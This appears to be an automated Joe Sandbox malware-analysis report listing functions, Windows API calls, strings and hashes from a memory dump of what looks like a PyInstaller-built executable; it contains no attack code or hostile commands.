Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: df73f32ea119d9442f90b1cd7416fbf19a59969f838bb2d0beac387528eaafd8
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 74411332A0878281DA209F24F8952AA73A6FF85360F580335E6AD877DADF7CD4449F40

Function 00007FF6399B11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6399B12C3
malloc, xrefs: 00007FF6399B129C, 00007FF6399B12CA
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6399B1295
1.3.1, xrefs: 00007FF6399B1229
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6399B1256
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6399B13EE

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: 776accb740eed174f358c558dc4ea9d7882ceb26f553e8fcacba1f44cef6fe48
Instruction ID: 88179a86b7aa1330dad24a7fc1667e6f97bd9599c60cf048bf6b2e81c4725f7c
Opcode Fuzzy Hash: 776accb740eed174f358c558dc4ea9d7882ceb26f553e8fcacba1f44cef6fe48
Instruction Fuzzy Hash: 5F51A422A0864285E6609F16A8503BA62A3FF85794F4C4135ED4EC7BDFEF3CE545EB00

Function 00007FF6399B7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6399B3834), ref: 00007FF6399B7CE4
CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF6399B3834), ref: 00007FF6399B7D2C

Part of subcall function 00007FF6399B7E10: GetEnvironmentVariableW.KERNEL32(00007FF6399B365F), ref: 00007FF6399B7E47
Part of subcall function 00007FF6399B7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6399B7E69

Part of subcall function 00007FF6399C7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C7561

Part of subcall function 00007FF6399B26C0: MessageBoxW.USER32 ref: 00007FF6399B2736

Strings

_MEI%d, xrefs: 00007FF6399B7CF2
TMP, xrefs: 00007FF6399B7C7C, 00007FF6399B7D83
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6399B7CBC
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6399B7D5E
TMP, xrefs: 00007FF6399B7CA2

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
Instruction ID: b1cb2114d5c8f8c634ee8cef3f7cf102009a4b885aee3159c63c129c3c46d4e4
Opcode Fuzzy Hash: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
Instruction Fuzzy Hash: D1414C11A0D64281EA20AF6A9D952F91263EF957C0F884132D90EC7BDFEE3CE540AF40

Function 00007FF6399CAD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CB199

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
Instruction ID: 5748faccd5ef5678ca2b6ef09e05b2af5f75f984602b9b99672265fd744ff17d
Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
Instruction Fuzzy Hash: F6C1CF22E0C68791EB609F1598402BE7792EB91B80F5D0131EA4E837DBCE7DE855EF10

Function 00007FF6399B7B50 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6399B7B70
OpenProcessToken.ADVAPI32 ref: 00007FF6399B7B83
GetTokenInformation.KERNELBASE ref: 00007FF6399B7BA8
GetLastError.KERNEL32 ref: 00007FF6399B7BB2
GetTokenInformation.KERNELBASE ref: 00007FF6399B7BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6399B7C0E
CloseHandle.KERNEL32 ref: 00007FF6399B7C26

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: fa100e685baa98e829519164d8c7bae0263b828ebdd9095db38f9558f9492d32
Instruction ID: ef14b38fe6606a733dda591b69af5bef2592ed940bce44ba1d5f0d51a78d3933
Opcode Fuzzy Hash: fa100e685baa98e829519164d8c7bae0263b828ebdd9095db38f9558f9492d32
Instruction Fuzzy Hash: DD212321A0CA4341EB109F59E88422AA3A2EF857A4F180239DA6D83FDEDF7DD4459F00

Function 00007FF6399B33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6399B3534), ref: 00007FF6399B3411

Part of subcall function 00007FF6399B29E0: GetLastError.KERNEL32(?,?,?,00007FF6399B342E,?,00007FF6399B3534), ref: 00007FF6399B2A14
Part of subcall function 00007FF6399B29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6399B342E), ref: 00007FF6399B2A7D
Part of subcall function 00007FF6399B29E0: MessageBoxW.USER32 ref: 00007FF6399B2ACF

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF6399B34B8
\\?\, xrefs: 00007FF6399B3482
GetModuleFileNameW, xrefs: 00007FF6399B3422
Failed to resolve full path to executable %ls., xrefs: 00007FF6399B3461
Failed to obtain executable path., xrefs: 00007FF6399B341B

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: 0b821c11b5d6de232619a43c745e28e1b4ccaa86e4296a8c93d4fa5f0bbe5a05
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: EF216B61B1858291FA21DF25E8513B96263FF5C384F880136D65DC67EFEE6CE508AB00

Function 00007FF6399B8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6399B7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6399B7B70
Part of subcall function 00007FF6399B7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6399B7B83
Part of subcall function 00007FF6399B7B50: GetTokenInformation.KERNELBASE ref: 00007FF6399B7BA8
Part of subcall function 00007FF6399B7B50: GetLastError.KERNEL32 ref: 00007FF6399B7BB2
Part of subcall function 00007FF6399B7B50: GetTokenInformation.KERNELBASE ref: 00007FF6399B7BF2
Part of subcall function 00007FF6399B7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6399B7C0E
Part of subcall function 00007FF6399B7B50: CloseHandle.KERNEL32 ref: 00007FF6399B7C26

LocalFree.KERNEL32(?,00007FF6399B3814), ref: 00007FF6399B848C
LocalFree.KERNEL32(?,00007FF6399B3814), ref: 00007FF6399B8495

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6399B8462
D:(A;;FA;;;%s), xrefs: 00007FF6399B8477
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6399B84A3
S-1-3-4, xrefs: 00007FF6399B8441

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 00508f9f8b173662f129ea82402565ecad2bd7bdcd40e7a91b5badc9791cb352
Instruction ID: cf5a2a6b53f2efb6eccfc0ac2e03a34256d4f46bf319862f4e01472a21cdf172
Opcode Fuzzy Hash: 00508f9f8b173662f129ea82402565ecad2bd7bdcd40e7a91b5badc9791cb352
Instruction Fuzzy Hash: 33212F22A0864292F610AF11E9552E962B6FF98780F4C4435EA4D87BDBDF3CD945DB80

Function 00007FF6399CC270 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6399CC25B), ref: 00007FF6399CC38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6399CC25B), ref: 00007FF6399CC417

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction ID: 556f40c70d83627847319ecf1d1fc412200c3595e18f3c8243bdcbd8c870ccb9
Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction Fuzzy Hash: E391A672F0865295F750CF65988027D6BA2BB44F88F584539DE0E96BCEEE38E441EF10

Function 00007FF6399C4938 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C4965
CreateFileW.KERNELBASE ref: 00007FF6399C49A4
CloseHandle.KERNEL32 ref: 00007FF6399C49D9

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: d86e09f8cbbad61bca77b3c1c794342783440ca4a578cbe66bbc096c242f6ef3
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: A4418322E1878283F7548F6199503696362FF947A4F149334E69E83BDADF6CA5E09F00

Function 00007FF6399BBF5C Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6399BC12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6399BC140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6399BBF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF6399BBFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6399BC041

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: 8a9f39432b948cad89da80364e2310a65faae9c4efa567a0c76dc4086c1912a0
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: A6313B21E0C24341FA54AF6994563BA23A3DF45388F4C0039EA4EC73DFEE6CA844AE11

Function 00007FF6399BF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399BF4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399BF597

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bcfcf1faf55df9f9e23f958511fce33fc2a490ff62131b022dace26bbec7c8c2
Instruction ID: 1f44f84ff129918ef5f3b68ce49d1b10d00982163c535169be32d39b147f081c
Opcode Fuzzy Hash: bcfcf1faf55df9f9e23f958511fce33fc2a490ff62131b022dace26bbec7c8c2
Instruction Fuzzy Hash: 6351C861B0924686F728AEA6980467A66A3FF44BB4F1C4634DD6D877DFCE3CD401AE00

Function 00007FF6399CB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6399CB5DD), ref: 00007FF6399CB490
GetLastError.KERNEL32(?,?,?,?,?,00007FF6399CB5DD), ref: 00007FF6399CB49A

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: 97379b8f0a5df6675013fbd6b14d18b1a607e48d8dd03c19710b3dc120bc145e
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 6E118262A1CA8281DA108F25A844169B362AB48BF4F584331EE7D877EFCE7CD150DF40

Function 00007FF6399C9C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C6E
GetLastError.KERNEL32(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C78

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction ID: 16df52110ee5e55702c2eb7e830f0380646ec7fa15918a9bd4f9681bfb5eda65
Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction Fuzzy Hash: 7CE0B650F0964682FF186FB2AC9517912A79F98742B4C4034D91EC73DBEE2C6845AE64

Function 00007FF6399C9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6399C9CE5,?,?,00000000,00007FF6399C9D9A), ref: 00007FF6399C9ED6
GetLastError.KERNEL32(?,?,?,00007FF6399C9CE5,?,?,00000000,00007FF6399C9D9A), ref: 00007FF6399C9EE0

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 6872ea66d87ee275f1728c6d3d61bce00b027398d8511cba363d58449f465ec7
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: F1219251F1C64241EB549B65AD9037922979F94790F1C4235E92EC77DBCE6CE840AF00

Function 00007FF6399CB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CB1E4

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 1ef58e78cba51d7d1ac4b0c52c93c23deca71ee39994f10030582f55c7ce0763
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 4041D332D4964287EA249F25A94127D73A6EB55B80F180131D68EC37DACF3CE402EF51

